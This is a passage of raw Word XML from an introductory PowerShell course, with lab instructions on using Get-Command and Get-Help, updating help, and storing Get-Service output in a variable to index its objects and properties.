          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Do all the commands available from the “Command” window work in PowerShell? Why might some be broken? We encourage you to go see what commands are available in both “Command” window and PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4A4978" w14:textId="77777777" w:rsidR="00536425" w:rsidRDefault="00536425" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F14035" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="00DF4366"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CA6024">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>That Help was helpful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A391343" w14:textId="77777777" w:rsidR="00CA6024" w:rsidRDefault="00CA6024" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA4BB4C" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="00302066"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3CB210CD" w14:textId="77777777" w:rsidR="00F666D0" w:rsidRDefault="00F666D0" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="163B592C" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="003402C7" w:rsidRDefault="00020640" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To familiarize you with the help functions built into PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD8B882" w14:textId="77777777" w:rsidR="00017473" w:rsidRDefault="00017473" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2B5706" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="00302066"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FB66E80" w14:textId="77777777" w:rsidR="00CA6024" w:rsidRDefault="00CA6024" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B9FEF0" w14:textId="77777777" w:rsidR="00CA6024" w:rsidRDefault="00020640"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In the last lab we ran Help form our “Command” window and it gave us a list of commands to run from the C:\&gt; prompt. Sure would be great if PowerShell had a help command… and God knows I need all the help I can get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA228BF"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6EB4401C" w14:textId="5C2EE4BB"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Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB9990" w14:textId="0E09B559"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Help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB6443" w14:textId="77777777" w:rsidR="006E1CD4" w:rsidRPr="003402C7" w:rsidRDefault="006E1CD4" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E76203F" w14:textId="77777777" w:rsidR="004A585A" w:rsidRDefault="004A585A" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BFC975" w14:textId="77777777" w:rsidR="004A585A" w:rsidRPr="003A12DF" w:rsidRDefault="004A585A"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622089">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA06CAA" w14:textId="77777777" w:rsidR="00CA6024" w:rsidRDefault="00CA6024" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71758375" w14:textId="77777777" w:rsidR="00622089"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Run the Get-Command cmdlet</w:t>
      </w:r>
      <w:r w:rsidR="00622089">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44410734" w14:textId="77777777" w:rsidR="00A400DA"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Just in case you weren’t following along, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00962E4A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get-Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your PowerShell console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE3EB8" w14:textId="77777777" w:rsidR="00020640"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eview the output (you’ll have to scroll a bit) something that relates to help. Hint it is a verb-noun context and the noun is help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5678D0BD" w14:textId="77777777" w:rsidR="00020640" w:rsidRPr="00622089"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 you see any aliases?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECCFD4" w14:textId="77777777" w:rsidR="00622089" w:rsidRDefault="00622089"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3B1BA4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Making Sense </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B1BA4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of  Help</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5EEDEACE" w14:textId="77777777" w:rsidR="002F7DAD" w:rsidRDefault="00D64193"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6855C52A" w14:textId="77777777" w:rsidR="00D64193" w:rsidRDefault="00D64193"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Help or man are aliases to get-help you can run those too</w:t>
      </w:r>
      <w:r w:rsidR="00653817">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D79BE6A" w14:textId="77777777" w:rsidR="003B1BA4" w:rsidRDefault="003B1BA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ning get-help w/o parameters/qualifiers displays the available help options: update, online, examples etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028AC067" w14:textId="77777777" w:rsidR="003B1BA4" w:rsidRDefault="003B1BA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run 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basically getting help on the help cmdlet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003E55E" w14:textId="77777777" w:rsidR="003B1BA4" w:rsidRDefault="003B1BA4"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this is your first time running PowerShell you may notice that you get “limited help”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50831899" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="00CA4184" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4184">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>REMARKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50538112" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">    Get-Help cannot find the Help files for this cmdlet on this computer. It is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B6110" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">    displaying only partial help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34176E44" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">        -- To download and install Help files for the module that includes this cmdlet, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDFD2D" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">    use Update-Help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22164BFD" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">        -- To view the Help topic for this cmdlet online, type: "Get-Help </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0036022B">
        <w:t>Get-Help</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DFBEF" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">    -Online" or </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266D432" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve">           go to http://go.microsoft.com/fwlink/?LinkID=113316.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE749DF" w14:textId="77777777" w:rsidR="0036022B" w:rsidRPr="0036022B" w:rsidRDefault="0036022B" w:rsidP="00F256E3">
      <w:r w:rsidRPr="0036022B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09C356" w14:textId="77777777" w:rsidR="003B1BA4" w:rsidRDefault="00AB0FC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o we have some options here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A976D1F" w14:textId="77777777" w:rsidR="00AB0FC4" w:rsidRDefault="00AB0FC4"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erform and update get-help –update</w:t>
      </w:r>
      <w:r w:rsidR="00656FD7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, alternatively we could have performed a update-help cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41FE8D" w14:textId="781285BC" w:rsidR="00AB0FC4" w:rsidRDefault="00AB0FC4" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0FC4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Or go to the online version of the help information get-help –online </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0FC4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>online</w:t>
      </w:r>
      <w:r w:rsidR="003A0131">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a parameter/ “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0FC4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qualifier”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF3B39" w14:textId="77777777" w:rsidR="00AB0FC4" w:rsidRDefault="00AB0FC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 –update to update the help information within PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1F9E93" w14:textId="77777777" w:rsidR="00AB0FC4" w:rsidRDefault="00DC05E9"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Run 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again… notice any differences?</w:t>
      </w:r>
      <w:r w:rsidR="00653817">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now try adding some parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61132EF7"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full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD9119"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examples (my personal favorite…wait there are two of you teaching so whose favorite is it?... you’ll never know)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B43DFB"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detailed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA8E1D" w14:textId="77777777" w:rsidR="002F7DAD" w:rsidRDefault="002F7DA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3: </w:t>
      </w:r>
      <w:r w:rsidR="00DF6A77">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Class Activity – what you thought we were going to give you everything for free and not save some special nuggets just for the class… shame on you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EAD6C3" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7"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Lab 3 Playing with objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3DC3B7" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758A2B41" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7"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50AA4C7B" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3044EBDE" w14:textId="77777777" w:rsidR="003402C7"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gain a familiarity with objects and how to pull information out of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F196DAD" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D91715E" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7"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7FB71616" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD73C69" w14:textId="77777777" w:rsidR="003402C7"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In class we gave you a snippet of what the get-service command returns. In this lab we will further look into what is returned and see how we can play with the object returned. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BD59C"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0A748D04" w14:textId="3CA055C7"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service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD48287" w14:textId="6E0779DF"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owerShell variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C254F9B" w14:textId="77777777" w:rsidR="006E1CD4" w:rsidRPr="005525A0" w:rsidRDefault="006E1CD4" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353549B5" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58597C1E" w14:textId="77777777" w:rsidR="003402C7" w:rsidRPr="003A12DF" w:rsidRDefault="003402C7"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7BFB8328" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE383D3" w14:textId="77777777" w:rsidR="003402C7" w:rsidRPr="00622089"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Let’s look at the get-service cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47980DB1" w14:textId="1E1745BB" w:rsidR="003402C7" w:rsidRPr="00962E4A" w:rsidRDefault="003402C7" w:rsidP="00962E4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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the Get-service cmdlet and take note of the amount of data returned. We will be learning how to filter what is returned in the next lab so be patient for now we want to see the “object”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5207AF" w14:textId="77777777" w:rsidR="003402C7" w:rsidRPr="003402C7" w:rsidRDefault="003402C7"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 xml:space="preserve">Stage 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Assigning get-service to a variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD89E1" w14:textId="77777777" w:rsid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are going to run get-service again, but this time we are going to do so by assigning a variable to it. Run the following command $variable1=get-service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F7D9E" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7"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y isn’t anything returned to the screen? The simple answer is it is now all stored in the variable named variable1 (what a creative name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA2DA0F" w14:textId="77777777" w:rsidR="003402C7" w:rsidRP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we want to see the output of get-service all we have to do is type $variable1 – go ahead try it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58944C1C" w14:textId="77777777" w:rsid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As stated in class the objects returned are arrays so we can interact with them the same way as an array. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38C622" w14:textId="77777777" w:rsidR="003402C7" w:rsidRDefault="003402C7"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see the first object in the array type $variable1[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915D8C6" w14:textId="77777777" w:rsidR="003402C7"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ry iterating through the array on your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629F647" w14:textId="77777777" w:rsidR="00E03E70" w:rsidRDefault="00E03E70"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lastRenderedPageBreak/>
        <w:t>You can also interact with the properties of the object for example the name property. To see a list of only the names of the running services type $variable1.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D9CD2B" w14:textId="77777777" w:rsidR="00E03E70"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hat’s displayed now? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0E07B" w14:textId="77777777" w:rsidR="00E03E70"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an you do this on just one element in</w:t>
      </w:r>
      <w:r w:rsidR="00884241">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the array? Try it. $variable1[0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>].name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0C42C" w14:textId="77777777" w:rsidR="00884241" w:rsidRDefault="00884241"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 we will see later, there are more properties that we can interact with than what is presented on screen by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A029EA2" w14:textId="77777777" w:rsidR="00884241" w:rsidRPr="00E03E70" w:rsidRDefault="00884241"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Try getting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>starttype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> property from your $variable for the fourth element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C6DBD" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F"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r w:rsidR="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> Try on your</w:t>
      </w:r>
      <w:r w:rsidR="00023A38">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>own</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AD10A" w14:textId="77777777" w:rsidR="00EB5B0F" w:rsidRDefault="00EB5B0F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
